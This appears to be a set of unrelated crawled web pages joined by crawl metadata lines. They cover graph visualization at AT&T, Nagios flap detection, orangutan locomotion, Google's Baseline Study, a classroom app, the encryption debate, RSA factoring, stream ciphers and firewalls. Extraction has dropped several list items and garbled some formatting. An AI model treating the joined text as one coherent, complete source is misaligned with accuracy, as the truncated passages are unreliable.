This story, "Java: The once and future king of Internet programming" was originally published by JavaWorld. | <urn:uuid:5baad3c5-ea81-4e6d-bf82-221de80d5269> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2901696/software/java-the-once-and-future-king-of-internet-programming.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00246-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.932545 | 2,046 | 2.90625 | 3 |
Getting and Understanding the Bigger Picture
Simple, elegant, direct . . . graph visualizations can be informative, too. Without knowing anything about the underlying data and without even trying, you see relationships and patterns. The nodes and links could be Facebook connections, router-to-router links in a network, a transportation distribution hub, the path of a call through a call center, or the connections between objects in a compiled grammar. All are networks—a set of entities and the connections between them—and all can be analyzed through graph visualizations
There is information in the connections. A glance is enough to identify nodes with the most links, nodes straddling different subgroups, and nodes isolated by their lack of connections. Corporations might look at a graph to verify that marketing and sales are communicating, urban planners to monitor the interconnectedness, or isolation, of neighborhoods, biologists to discover interactions between genes, and network analysts to monitor security.
Graph creation made easy
Graph visualizations are everywhere. They need to be. Without them, there would simply be no way to make sense of the vast amounts of data collected.
Fortunately, graphs are easy to make thanks to automatic graph-drawing programs that take information describing a node and the node’s connections and automatically lay out a topology, handling the low-level details of how to arrange nodes so they don’t overlap and obscure one another. Feed in the data and get a picture.
Aesthetics is important not so much for looks . . . but for readability.
A multitude of graph drawing programs is available, many offering add-ons such as editors to manually change the node layout and adjust colors, shapes, and backgrounds to achieve visually appealing graphs.
Aesthetics is important not so much for looks—though some visualizations can be stunning to look at—but for readability. Links that intersect and nodes that overlay one another result in poor readability, and graph visualization programs work hard to minimize the number of link intersections and give enough whitespace around each node to make it stand out from its neighbors.
One method to ensure a good distribution of nodes, force-directed layout, endows each node with a repelling force to push away neighboring nodes that are too close while spring-like attachments on links work to keep connected nodes clustered together.
The nodes themselves find their own optimal position in turn. First one node employs its repelling force, moving too-close nodes further away. Then it’s the turn of the next node, and then another until each has had a chance to position itself. But the sequence needs to be repeated since later nodes may intrude into the space of a previous node; many iterations may be needed until a state of equilibrium is reached.
Force-directed layouts are computationally heavy but work well for graphs of 100-200 nodes; however, at larger scales (100,000 nodes and more), the scheme breaks down under the weight of all the calculations. As the number of nodes increases, the number of calculations increases quadratically. For n nodes, the number of calculations is on the order of n 2 . What works for small graphs won’t work for large ones.
At a company like AT&T, which operates some of the world’s largest networks, the problem of scale is a perennial issue. AT&T must often develop custom solutions to address the scale issue. This is one reason it maintains a sophisticated and wide-ranging research effort.
What works for small graphs won’t work for large ones.
For the visualizations needed for its large data collections, AT&T adapted its own network visualization program, Graphviz, which had originally been developed for graphing software objects. (Because all networks have a similar mathematic definition, there is little difference between rendering software objects and router-to-router links in communications networks, apart from the scale factor.) For the program to handle layouts with millions of nodes entailed key advancements in network visualization, including the introduction of advanced geometric and numerical optimization algorithms. Entirely new approaches including stress majorization and multilevel optimization were also required
Additional algorithmic enhancements were needed to ensure a readable, useful visualization, and Graphviz pioneered techniques in linear programming for aesthetic node placement, drawing curved edge splines around obstacles through numerical optimization, and robust overlap removal methods to preserve the overall structure of layouts while also making it possible to read labels even in tightly packed diagrams.
AT&T has made Graphviz available as open source software, and many other programs incorporate Graphviz as a visualization service for applications as diverse as databases and data analysis, bioinformatics, software engineering, programming languages and tools, and machine learning.
So how does Graphviz handle large datasets?
The first step is to reduce the size of the graph. It takes a few steps since it’s an iterative process in which each step halves the number of nodes. One million nodes becomes 500,000, which then becomes 250,000, all the way down to a manageable 50 or fewer nodes. At this point it’s a small graph and can employ force-directed techniques.
Of course, the way in which the nodes are reduced has to be done carefully and above all uniformly to preserve the original overall structure. This is not easy, and certain substructures, such as star graphs with an inordinate number of connections, must be identified and handled as special cases.
Various filtering and aggregating techniques are used to identify nodes that can be deleted without destroying the overall structure. One method is graph coarsening, which identifies perfectly matched node-links arrangements that can be collapsed without altering the overall topology.
Laying out large graphs is a hard problem, but viewing them is also hard.
Once a good layout is found through a force-directed algorithm, the graph is then built up again to its original size. For a graph the size of 1 million nodes, the entire process takes around 15 minutes; considering the number of calculations carried out and the range of operations, this is exceedingly fast. This time can be reduced significantly if a slight reduction in layout quality is allowed.
Large graphs and their information
Laying out large graphs is a hard problem, but viewing them is also hard. Large graphs won't display within the confines of a computer screen. Viewing a small part of the whole at a time is a solution, but not when it's important to see how changes in one part of the graph affect other parts. In communications networks such as those maintained by AT&T, investigating how various elements within the network interact and affect other parts is sometimes the whole point.
The Graphviz proposal is an interactive graph viewer, Smyrna, designed to handle large graphs. In addition to panning and zooming, Smyrna provides a topological fisheye view that magnifies an area of interest while keeping the entire graph in view to maintain the needed context. This is done by collapsing nodes outside the focal area in a way that the overall structure is maintained, with more distortion occurring in the nodes farthest from the focal area. The calculations for collapsing nodes are done in real time to ensure smooth transitions as the viewer navigates through the scene.
With Smyrna, the viewer can also navigate through three dimensions, which gives additional space to examine a graph's structure. Occlusions are more of a problem with 3D displays, though it's easy to manipulate the graph to see behind nodes. This ability to directly manipulate the graph structure, to turn it and move individual nodes involves the viewer with the graph in a way not possible with 2D graphs.
If you can move an individual node, the next natural step is to click a node for information (node information is very rich in Graphviz), which Smyrna supports. Clicking a node can access underlying data if the visualization associates an action with each node, such as opening a web page where the information can be found.
But more useful for accessing information and analyzing the data, is the ability in Smyrna to write queries and filter graphs based on attribute information and graph structure. Queries could locate all nodes sharing similar attributes, such as all people with the same last name or birthday, or locate all ISPs that recently handled a certain IP address.
Filtering a graph reduces a large graph to just the part that is relevant to the particular query.
The distinction between visualization and interface is being blurred.
Where until now, node-link layouts have emphasized representing relationships and have too often been an end of a process (feed in the data, see what it looks like, go back to the data), the abliity to directly access data, write queries, and closely investigate individual nodes show the potential of how visualizations can become part of the analysis process itself, and to answer questions such as "Why do some nodes cluster together?" "Which nodes in the entire graph share the same attributes?"
The distinction between visualization and interface is blurring, and the line between visualization and analysis is being crossed.
For visualizations to truly be part of the analysis, there remain some hard problems to solve. One, networks change constantly, and understanding where these changes occur is an important part of network analysis. But finding changes in large graphs is difficult, for two fundamental reasons.
One, the sheer size of a visualization containing millions of nodes makes it hard to see changes, especially those happening in obscure areas that are not often investigated.
Second, the way in which large graphs are generated, where the initial node placement may be random, can cause a large graph to look different every time it's generated, even when the data changes are small and limited to a few nodes. People build a mental map of what a graph looks like, based on how they first see it and look for changes by comparing the new layout with their mental map. Minor tweaking to add or delete a few nodes causes many nodes to self-adjust, giving the potential that the visualization may look much different from the menal map even though the changes are small. New or better algorithms are needed to preserve a node layout so small changes don't result in big changes, and do so in very fast computing time.
Other problems include handling small-world graphs, in which a high number of nodes are closely related, a common feature of social and communications networks. The resulting tight proximity and the number of shared links make layout particularly difficult. One solution being explored is to represent small-world subgraphs as a single, large node that expands when clicked.
There is no lack of incentive to find solutions to these and other problems of large graphs. Visualizations may be the only way to tackle the analysis of extra-large datasets, which will only become more numerous and bigger as data collection techniques multiply. Solutions will be found, and the only questions are what those solutions will be, and how soon.
Getting the Big Picture
Undirected layouts are used when there is no inherent ordering of the nodes. Graphs arising from communication and online social networks are undirected.
Circular layouts depict connections of nodes closely related to one another, such as those on a LAN.
Radial layouts depict networks focused on some central node, as arises in some social networks.
Matrixes can be visualized using the same node-link graphs. Yifan Hu of the Labs graphed over 2000 sparse data sets using Graphviz.
Reducing the number of edge crossings is key to graph readability, and most graph layout algorithms consider the task of arranging nodes to reduce crossings.
But there are other ways of approaching the readability problem.
What if you start with a different premise, such as reducing the amount of ink? Reducing the number length of links would reduce the amount of ink.
In this exercise, the nodes were sorted around the circle in a way to reduce the length of edges. This produced layouts with fewer crossings than when heuristics are used to explicitly reduce crossings. And from an idea based on the work of Danny Holten (Eindhoven University of Technology), lines that traversed the interior share the same path when possible, reducing the perceived number of intersections as well
The resulting increase in white space reduces the clutter.
But can the graph be made clearer still?
The solution. Forget about saving ink, and try something new.
Rerouting links around the outside of the circle minimizes link crossings dramatically.
It uses more ink of course, but in graphs, clarity is all. | <urn:uuid:1b12fa16-0b53-4e00-8497-0b870262410d> | CC-MAIN-2017-04 | http://www.research.att.com/articles/featured_stories/2009/200910_more_than_just_a_picture.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00274-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940921 | 2,573 | 3.0625 | 3 |
Up To: Contents
See Also: State Types
Nagios supports optional detection of hosts and services that are "flapping". Flapping occurs when a service or host changes state too frequently, resulting in a storm of problem and recovery notifications. Flapping can be indicative of configuration problems (i.e. thresholds set too low), troublesome services, or real network problems.
How Flap Detection Works
Before I get into this, let me say that flapping detection has been a little difficult to implement. How exactly does one determine what "too frequently" means in regards to state changes for a particular host or service? When I first started thinking about implementing flap detection I tried to find some information on how flapping could/should be detected. I couldn't find any information about what others were using (where they using any?), so I decided to settle with what seemed to me to be a reasonable solution...
Whenever Nagios checks the status of a host or service, it will check to see if it has started or stopped flapping. It does this by:
A host or service is determined to have started flapping when its percent state change first exceeds a high flapping threshold.
A host or service is determined to have stopped flapping when its percent state goes below a low flapping threshold (assuming that it was previously flapping).
Let's describe in more detail how flap detection works with services...
The image below shows a chronological history of service states from the most recent 21 service checks. OK states are shown in green, WARNING states in yellow, CRITICAL states in red, and UNKNOWN states in orange.
The historical service check results are examined to determine where state changes/transitions occur. State changes occur when an archived state is different from the archived state that immediately precedes it chronologically. Since we keep the results of the last 21 service checks in the array, there is a possibility of having at most 20 state changes. In this example there are 7 state changes, indicated by blue arrows in the image above.
The flap detection logic uses the state changes to determine an overall percent state change for the service. This is a measure of volatility/change for the service. Services that never change state will have a 0% state change value, while services that change state each time they're checked will have 100% state change. Most services will have a percent state change somewhere in between.
When calculating the percent state change for the service, the flap detection algorithm will give more weight to new state changes compare to older ones. Specfically, the flap detection routines are currently designed to make the newest possible state change carry 50% more weight than the oldest possible state change. The image below shows how recent state changes are given more weight than older state changes when calculating the overall or total percent state change for a particular service.
Using the images above, lets do a calculation of percent state change for the service. You will notice that there are a total of 7 state changes (at t3, t4, t5, t9, t12, t16, and t19). Without any weighting of the state changes over time, this would give us a total state change of 35%:
(7 observed state changes / possible 20 state changes) * 100 = 35 %
Since the flap detection logic will give newer state changes a higher rate than older state changes, the actual calculated percent state change will be slightly less than 35% in this example. Let's say that the weighted percent of state change turned out to be 31%...
The calculated percent state change for the service (31%) will then be compared against flapping thresholds to see what should happen:
If neither of those two conditions are met, the flap detection logic won't do anything else with the service, since it is either not currently flapping or it is still flapping.
Flap Detection for Services
Nagios checks to see if a service is flapping whenever the service is checked (either actively or passively).
The flap detection logic for services works as described in the example above.
Flap Detection for Hosts
Host flap detection works in a similiar manner to service flap detection, with one important difference: Nagios will attempt to check to see if a host is flapping whenever:
Why is this done? With services we know that the minimum amount of time between consecutive flap detection routines is going to be equal to the service check interval. However, you might not be monitoring hosts on a regular basis, so there might not be a host check interval that can be used in the flap detection logic. Also, it makes sense that checking a service should count towards the detection of host flapping. Services are attributes of or things associated with host after all... At any rate, that's the best method I could come up with for determining how often flap detection could be performed on a host, so there you have it.
Flap Detection Thresholds
Nagios uses several variables to determine the percent state change thresholds is uses for flap detection. For both hosts and services, there are global high and low thresholds and host- or service-specific thresholds that you can configure. Nagios will use the global thresholds for flap detection if you to not specify host- or service- specific thresholds.
The table below shows the global and host- or service-specific variables that control the various thresholds used in flap detection.
|Object Type||Global Variables||Object-Specific Variables|
States Used For Flap Detection
Normally Nagios will track the results of the last 21 checks of a host or service, regardless of the check result (host/service state), for use in the flap detection logic.
Tip: You can exclude certain host or service states from use in flap detection logic by using the flap_detection_options directive in your host or service definitions. This directive allows you to specify what host or service states (i.e. "UP, "DOWN", "OK, "CRITICAL") you want to use for flap detection. If you don't use this directive, all host or service states are used in flap detection.
When a service or host is first detected as flapping, Nagios will:
When a service or host stops flapping, Nagios will:
Enabling Flap Detection
In order to enable the flap detection features in Nagios, you'll need to:
If you want to disable flap detection on a global basis, set the enable_flap_detection directive to 0.
If you would like to disable flap detection for just a few hosts or services, use the flap_detection_enabled directive in the host and/or service definitions to do so. | <urn:uuid:3ed97c12-69bb-4189-bba8-88cdf6397a5f> | CC-MAIN-2017-04 | https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/3/en/flapping.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00182-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.917473 | 1,377 | 2.578125 | 3 |
Walking in Trees
A research team observing wild orangutans in Sumatra, Indonesia, found that walking on two legs may have originated in ancient, tree-dwelling apes, rather than in more recent human ancestors who lived on land, as current theory suggests.
Walking upright, or bipedalism, has long been considered a defining feature of humans and our closest ancestors. One of the most popular explanations, the "savannah hypothesis," suggests that chimps, gorillas and human ancestors descended from tree-swinging primates and began walking on the ground on all fours.
Over time, this four-legged gait would have evolved into the "knuckle-walking" that chimps and gorillas still use today, and then into upright, two-legged walking in humans.
Paleontologists have conventionally used signs of bipedalism as key criteria for distinguishing early human fossils from those of apes. But this distinction is complicated by recent fossil evidence that some early humans, including Lucy, lived in woodland environments, while even earlier forms, such as Millennium Man, might have lived in the forest canopy and moved on two legs.
To collect the data, Susannah Thorpe of the University of Birmingham, UK, spent a year living in the Sumatran rainforest, recording virtually every move the orangutans made. She and her colleagues then used these observations to test the hypothesis that bipedalism would have benefited our tree-dwelling ape ancestors.
- American Association for the Advancement of Science | <urn:uuid:ae8b3945-8b60-4ccc-8e62-8f206da2dc12> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Walking-in-Trees.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00026-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948067 | 318 | 4.0625 | 4 |
New genetic study could define a healthy human.
Google has embarked on Baseline Study – a quest inside the human body, as part of its mission to define the ideal ‘healthy human’.
In what is said to be the tech firm’s most ambitious and difficult science project ever, Google X’s latest Moonshot Project involves the collection of a mass of genetic and molecular information to develop a picture of what makes up the perfect healthy human.
Google X’s Dr. Andrew Conrad told the Wall Street Journal: "With any complex system, the notion has always been there to proactively address problems.
"That’s not revolutionary. We are just asking the question: If we really wanted to be proactive, what would we need to know? You need to know what the fixed, well-running thing should look like."
Without bounding to specific diseases, the project will gather different samples via a range of new diagnostic tools and then Google will deploy its computing command to uncover patterns or ‘biomarkers’ beneath the information.
Medical researchers can use the discovered biomarkers to become aware of any disease a much earlier.
Google noted that the information obtained from Baseline Study will be secret, with its use being limited only to medical and health purposes, and not to be shared with insurance firms.
Institutional review boards will monitor the Baseline project, supervising all medical research involving humans and, once the study gets accelerated, boards operated by the medical schools at Duke University and Stanford University would keep an eye on how the data is used.
Stanford University’s medical school Department of Radiology chair, Sam Gambhir, said: "That’s certainly an issue that’s been discussed.
"Google will not be allowed free rein to do whatever it wants with this data."
As part of the Baseline Study, the team will initially collect its information from 175 volunteers, with several thousands more anticipated to join the project over time.
Furthermore, the Google and other researchers will be able to access data including participants’ entire genomes; parents’ genetic record; information on how they metabolise food, nutrients and drugs; their heart beat rate under stress; and the impact of chemical reactions on their genes. | <urn:uuid:29df80e4-a9d6-4469-a4bf-afa5a3504521> | CC-MAIN-2017-04 | http://www.cbronline.com/news/google-searches-deeper-into-human-body-250714-4327463 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00466-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.925922 | 469 | 3.515625 | 4 |
Over the last few months, the topic of encryption has become a common debate amongst the technology industry and government agencies.
Recently, the major tech giant Apple was approached by the U.S. Department of Justice to unlock an iPhone 5C used in connection to the San Bernardino shooting. After resisting a court order demanding the iPhone be unlocked, Apple explained that doing so would create a backdoor that could be exploited in other iPhones.
In response, other tech giants like Facebook and Google have claimed they are working to make consumer data as secure as possible, even from the eyes of the government. While Facebook already utilizes encryption with its WhatsApp messaging service, they’re looking to apply the same style of encryption to the services’ voice calls and group messages. Google is currently researching whether it’s possible for them to apply the encryption method used for emails to other products.
The battle between Silicon Valley and the U.S. government has been going on long before the Apple and DoJ debate. While the tech industry places a higher priority on security its consumer’s private data, the government feels this encryption obstructs their ability to access information vital in criminal and terrorist investigations. Fortunately, the federal government understands that weakening encryption or allowing for backdoors would allow enemies to hack into U.S. products & networks.
One idea proposed by tech industry experts states companies could be asked to hand over metadata for criminal investigations while still keeping the content of the message encrypted, allowing government officials access to the names of individuals messaging as well as where and when they communicated.
While the topic of encryption may not be a light one, there's one thing most people can agree on- keeping sensitive data out of our enemies hands is of top priority. From an enterprise standpoint, hackers are becoming more and more sophisticated with their means of attack and these institutions should remain vigilant and alert when it comes to securing this sensitive personally identifiable information. Making sure your system is hardening & vulnerability free, coupled with Continuous File Integrity Monitoring and Breach Detection & Host Intrusion Detection will help protect your IT estate against a malicious attack. | <urn:uuid:d4689df5-3f6f-4047-a063-8bb85b1b27dd> | CC-MAIN-2017-04 | https://www.newnettechnologies.com/tech-giants-like-fb-google-beefing-up-data-security-methods-amid-encryption-debate.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00311-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942589 | 425 | 2.5625 | 3 |
Carnegie Mellon University educators have created an app inspired by social network sites like Twitter and Facebook that is designed to bring students together to improve learning.
The Classroom Salon app has been used by thousands of high school and college students this past year (see video below of some users talking about it) and will be extended to students at the University of Baltimore this year in an effort to see if it can help prevent students from failing introductory courses and eventually dropping out of school.
Classroom Salon is currently available for use by invitation only, but you can see on the site examples of how it works. Social networking mechanisms are employed to give users of the system the ability to comment via online anotations on assigned texts, such as a fellow student's writing. Students can then filter through the comments based on who made the comments and can be steered by color coded highlighting to parts of their writing that generated the most discussion. An example on the site shows an anotated version of President Obama's second State of the Union Address.
"Sites such as Facebook and Twitter have captured the attention of young people in a way that blogs and online discussion forums have not," said Ananda Gunawardena, associate teaching professor in the CMU Computer Science Department, in a statement (He developed CLS with David S. Kaufer, an English professor). "With Classroom Salon, we've tried to capture the sense of connectedness that makes social media sites so appealing, but within a framework that that allows groups to explore texts deeply. So it's not just social networking for the sake of socializing but enhancing the student experience as readers and writers."
A $250K grant from the Next Generation Learning Challenges program backed by the Bill & Melinda Gates Foundation and the William and Flora Hewlett Foundation will support using the app at the University of Baltimore. It will be used in conjunction with free learning resources from CMU's Open Learning Initiative. | <urn:uuid:aa52a55c-b0f6-4d49-b7b1-57db4ecd0b7e> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2229158/smb/can-social-networking-save-students-from-failing-in-school-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00431-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951664 | 392 | 2.796875 | 3 |
A seemingly legitimate application (app) that secretly performs other, usually malicious, functions detrimental to the user's personal information and/or the user's control of the device on which the app is installed.
F-Secure SAFE automatically blocks installation of this program.
Trojans that function on the Android operating system (OS) are typically repackaged or trojanized versions of useful or desirable programs (such as a popular game, system update or utility program). These trojans are often distributed using either the same name and branding as the original app or as similar programs, in order to deceive the user into installing the trojan.
Once the trojan is installed on the device, it silently performs its actual, unauthorized functions, which may range from harvesting personal data from the device, to sending premium SMS messages or intercepting SMS messages, connecting the device to a mobile botnet and so on. Examples of trojans with such capabilities include:
For more information about malware on the Android platform, see the latest Mobile Threat Reports . | <urn:uuid:091af36e-2cfd-410f-9ef9-bea494380267> | CC-MAIN-2017-04 | https://www.f-secure.com/v-descs/trojan_android.shtml | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00339-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.838009 | 212 | 2.609375 | 3 |
That there is a growing need for trained data scientists and other people with analytics skills is not a matter of debate. An important question is how to fill the need.
Since the educational system can respond slowly to skills needs in the technology workforce, training existing workers is emerging as a key option. Many corporations have taken it upon themselves to teach people data analytics skills.
No corporation is as ambitious in this regard as IBM. In March 2011, Big Blue launched a series of big data “boot camps” at various universities as well as IBM innovation centers and online. Five months later, IBM went all in, launching Big Data University (BDU) with help from partners such as Amazon, Jaspersoft, Rightscale, SciSpike and growing list of other companies in the field.
Big Data University offers free online classes and certifications to all comers under the premise that teaching as many people as possible about big data and analytics could help not just businesses, but society.
“One of the things we were seeing was that the use cases now possible with big data can actually have an impact on human life,” explains IBM Big Data VP Anjul Bhambhri. “In health care we’ve seen big data be leveraged to predict the onset of an infection in a newborn baby 24 hours in advance, to be able to diagnose if there are symptoms that could lead to brain hemorrhage. When you see these kinds of possibilities, you don’t want people not adopting this technology and solving these problems for lack of education.”
A Global Classroom
So far more than 42,000 students from around the world have registered for the cloud-hosted classes for IBM’s program. Bhambhri says the largest numbers of students come from North America, India, China, Japan, Russia and Europe, even though classes are now offered only in English.
The courses are devised and run by volunteer members of the Hadoop, big data and database global communities who are employed by IBM and some of its BDU business partners. The classes fall into three basic categories: big data-related topics, database (DB2) related topics and miscellaneous topics.
The curriculum at BDU is flexible, with no prerequisites for courses. But there is a “suggested path” for students. For example, under the big data category, BDU lays out the following suggested course sequence:
1. Big data analytics demos (an overview of what big data is, why is matters, and its characteristics)
2. Hadoop Fundamentals I
3. Hadoop and the Amazon Cloud
4. Hadoop and the IBM Smartcloud Enterprise
5. Hadoop Fundamentals II
Students more interested in the analytics aspect of BDU are advised to start with No. 1 above before proceeding to:
2. Spreadsheet-like analytics
3. Text analytics essentials
4. Query languages for Hadoop
Each BDU course includes a test students can take following their studies. Students who pass can print out a certificate of completion.
How long a student takes to complete a course is pretty much up to them, as BDU emphasizes a “learn at your own pace” philosophy, though much depends on a student’s familiarity and experience with the topic matter, says Bhambhri.
“People who have a background in data mining or analytics, even though they may have done data mining and analytics for structured data, for them to expand their knowledge into the big data world would be fairly easy,” she says. Those people should be able to go through the curriculum in “a few weeks,” Bhambhri says.
Someone with “no background in data mining and analytics” might take at least a couple of months to absorb all the information in a curriculum category, she says.
However, some individual courses can be completed in as little as one day, Bhambhri says.
BDU may never have a football team, but it has growing body of students and a mandate to spread knowledge that will help fill a daunting gap between the possibilities of big data technology and the necessary skills to leverage it.
As Bhambhri says, “The shortage of data scientists will never be overcome but by education.” | <urn:uuid:da29cb3f-12d5-410d-a05b-0b30b43ecfe8> | CC-MAIN-2017-04 | http://data-informed.com/ibms-big-data-university-address-analytics-skills-gap/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00063-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954313 | 897 | 2.53125 | 3 |
RSA is an algorithm used in public key cryptography, and its discovery by Rivest, Shamir and Adleman (hence RSA) was a momentous development in the world of encryption. Subsequently RSA is used throughout the world as a way of encrypting data using a public key available to all and a secret private key kept by the person who wishes to decrypt the cipher text.
The beauty of RSA is the use of a special function that enables the one way mathematical treatment of plaintext data such that it can only be decrypted by this private key. In essence it is a one way function with a trap door—the private key. The success of RSA is based on the difficulty of factorising large numbers, something that requires exponential computing resource rather than the polynomial computing resource to encrypt the data using a public key.
As computing power has increased, the available horsepower to brute force crack RSA algorithms has grown as well. The most recent announcement, in December 2009, was that a group of mathematicians, computer scientists and cryptographers had managed to factorise a 768-bit RSA key using a technique called the number field sieve or NFS. That puts the next milestone, the 1024-bit RSA key, in reach in the next decade or so.
In reality this may have been an interesting academic exercise but current industry standards suggest that 1024 moduli aren't used after 2010 anyway—standards put in place to address the foreseen increase in computer horsepower. Unless a real smart way is found to factorise numbers using some undiscovered mathematical technique then RSA key sizes will increase in line with required encryption cover time anyway, preserving the use of the RSA algorithm for the foreseeable future. Panic over.
As an aside what I found more amusing when reading the paper was this comment;
"...this required a bit more organizational efforts than expected, occasional recovery from mishaps such as unplugged network cables, switched off servers, or faulty raids, and a constantly growing farm of backup drives. We do not further comment on these more managerial issues in this article, but note that larger efforts of this sort would benefit from full-time professional supervision."
I must admit to sniggering at the image of these well respected academics tripping over cables and unplugging servers as the experiment went on, for want of adult supervision. Maybe more "Carry on Cryptography" than we realise. | <urn:uuid:5d1bbc93-a797-43fd-838f-92f6d0551aa4> | CC-MAIN-2017-04 | http://www.bloorresearch.com/analysis/encryption-gets-a-battering-part-2-rsa/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00275-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943586 | 488 | 3.1875 | 3 |
As far as cloud service providers go, they will shift data around several locations depending on the cost factors and redundancy needed by the client. But in moving data across data centers all over the globe, these service providers also have to deal with privacy regulations and data residency laws. This becomes a critical area of reckoning when cloud service providers are processing data in locations which are known to have slightly less rigid laws as far as data protection goes. Cloud computing needs a flexible infrastructure but installing a data center in every data residency jurisdiction is not a practical solution.
When the movement of data is ruled by a large number of constraints then it can become a cost prohibitive option for clients. There is also the consideration of different regulations when it comes to national security.
For instance, the USA has FISA and the USA Patriot Act which have the power to subpoena cloud service providers for information stored in their infrastructure.
Read More About Cloud Computing | <urn:uuid:7a086666-c0ac-4b42-94ea-90a8aef0ad43> | CC-MAIN-2017-04 | http://www.datacenterjournal.com/data-residency-laws-govern-cloud-computing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00211-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952845 | 184 | 2.53125 | 3 |
3.6.10 What are some other stream ciphers?
There are a number of alternative stream ciphers that have been proposed in cryptographic literature as well as a large number that appear in implementations and products world-wide. Many are based on the use of LFSRs (Linear Feedback Shift Registers; see Question 2.1.5), since such ciphers tend to be more amenable to analysis and it is easier to assess the security they offer.
Rueppel suggests there are essentially four distinct approaches to stream cipher design [Rue92]. The first is termed the information-theoretic approach as exemplified by Shannon's analysis of the one-time pad. The second approach is that of system-theoretic design. In essence, the cryptographer designs the cipher along established guidelines that ensure the cipher is resistant to all known attacks. While there is, of course, no substantial guarantee that future cryptanalysis will be unsuccessful, it is this design approach that is perhaps the most common in cipher design. The third approach is to attempt to relate the difficulty of breaking the stream cipher (where "breaking" means being able to predict the unseen keystream with a success rate better than can be achieved by guessing) to solving some difficult problem (see [BM84] [BBS86]). This complexity-theoretic approach is very appealing, but in practice the ciphers developed tend to be rather slow and impractical. The final approach highlighted by Rueppel is that of designing a randomized cipher. Here the aim is to ensure the cipher is resistant to any practical amount of cryptanalytic work, rather than being secure against an unlimited amount of work, as was the aim with Shannon's information-theoretic approach.
A recent example of a stream cipher designed by a system-theoretic approach is the Software-optimized Encryption Algorithm (SEAL), which was designed by Rogaway and Coppersmith in 1993 [RC93] as a fast stream cipher for 32-bit machines. SEAL has a rather involved initialization phase during which a large set of tables is initialized using the Secure Hash Algorithm (see Question 3.6.5). However, the use of look-up tables during keystream generation helps to achieve a very fast performance with just five instructions required per byte of output generated.
A design that has system-theoretic as well as complexity-theoretic aspects is given by Aiello, Rajagopalan, and Venkatesan [ARV95]. The design, commonly referred to as "VRA," derives a fast stream cipher from an arbitrary secure block cipher. VRA is described as a pseudo-random generator (see Question 2.5.2), not a stream cipher, but the two concepts are closely connected, since a pseudo-random generator can produce a (pseudo) one-time pad for encryption.
For examples of ciphers in each of these categories, see Rueppel's article [Rue92] or any book on contemporary cryptography. More details are also provided in an RSA Laboratories technical report [Rob95a]. | <urn:uuid:08679719-3beb-491a-9a30-e3f79faed114> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/other-stream-ciphers.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00119-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964233 | 638 | 3.171875 | 3 |
It's all about having the right switch
A local area network (LAN) refers to an internal wired network at a particular location. PCs, servers, printers, and other network devices are networked via high-performance Gigabit switches. This is where security and reliability are an essential part of internal communication. LANCOM offers fully compatible hardware and software components for state-of-the-art network infrastructures. | <urn:uuid:67a40d4f-dd2f-4c0a-b186-ffc978edad90> | CC-MAIN-2017-04 | https://www.lancom-systems.com/solutions/network-connectivity/internal-networking/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00357-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.901276 | 85 | 2.6875 | 3 |
Most of us have heard about the concept of building a defense in depth in order to protect computer resources from black hat hackers. The idea revolves around the use of multiple defenses to thwart, or at least limit, the damage arising from a potential security breach.
Given the rapid pace of change in the security sector, some executives may have difficulty naming the specific safeguards that their companies deploy. This guide aims to shed some light on some of the more common aspects of computer security, and also serve as a checklist to identify potential areas upon which to improve.
1. Network firewall
The first line of defense against unwelcomed visitors would surely be the firewall. At one point, the use of dual firewalls from different vendors was all the rage, though the creation of a DMZ (Demilitarized zone) appears to be more popular these days. Internet-facing servers are typically placed within the DMZ, where they are encumbered by fewer restrictions and lesser monitoring than the internal corporate network.
There are actually a few different types of firewall implementations. For example, consumer-grade routers typically make use of Network Address Translation (NAT), which was originally created to address the problem of limited IPv4 routable addresses. Because the identity of hosts is obfuscated, NAT is often said to offer firewall capabilities.
At a minimum, a proper firewall typically offers packet filter technology, which allows or denies data packets based on established rules relating to the type of data packet and its source and destination address. Stateful packet filter firewalls conduct what is known as stateful packet inspection (SPI), which tracks active connections to sieve out spoofed packets, a superior approach to the stateless packet filtering firewall. Finally, a firewall operating on the application layer understands application-level protocols to identify sophisticated intrusion attempts.
